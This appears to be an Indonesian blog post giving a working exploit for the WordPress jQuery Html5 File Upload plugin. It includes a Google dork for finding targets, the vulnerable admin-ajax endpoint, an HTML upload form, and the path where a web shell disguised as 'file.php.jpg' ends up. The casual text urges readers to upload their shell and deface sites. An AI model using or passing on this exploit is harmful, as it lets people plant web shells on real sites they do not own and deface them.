Wordpress Plugins jQuery Html5 File Upload Vulnerability
################################################################################# # Wordpress Plugins jQuery Html5 File Upload Vulnerability | CSRF # Author : Akbar Dravinky # Google Dork: inurl:/wp-content/plugins/jquery-html5-file-upload/ # Tested on: Win 7, Linux # #################################################################################
# [!] Exploit : http://127.0.0.1/wp-admin/admin-ajax.php?action=load_ajax_function # [!] File Location : http://127.0.0.1/wp-content/uploads/files/guest/file.php.jpg
pertama² cara dlu target menggunakan dork diatas
ciri ciri vuln :
tinggal kalian pergi ke csrf
uploadshell extensi file.php.jpg
#[*] CSRF: ################################################################################# <html> <body> <form method="POST" action="http://127.0.0.1/wp-admin/admin-ajax.php?action=load_ajax_function" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form> </body> </html> #################################################################################
nah coba liat gambar diatas ,shell saya uda ke upload gan tinggal ngaksesnya
contoh :
http://target.co.li/wp-content/uploads/files/guest/file.php.jpg
nah kan uda ke upload gampang kan
tinggal upload sc pepes klian :v
terima kasih >_<
0 Response to "Wordpress Plugins jQuery Html5 File Upload Vulnerability "
Posting Komentar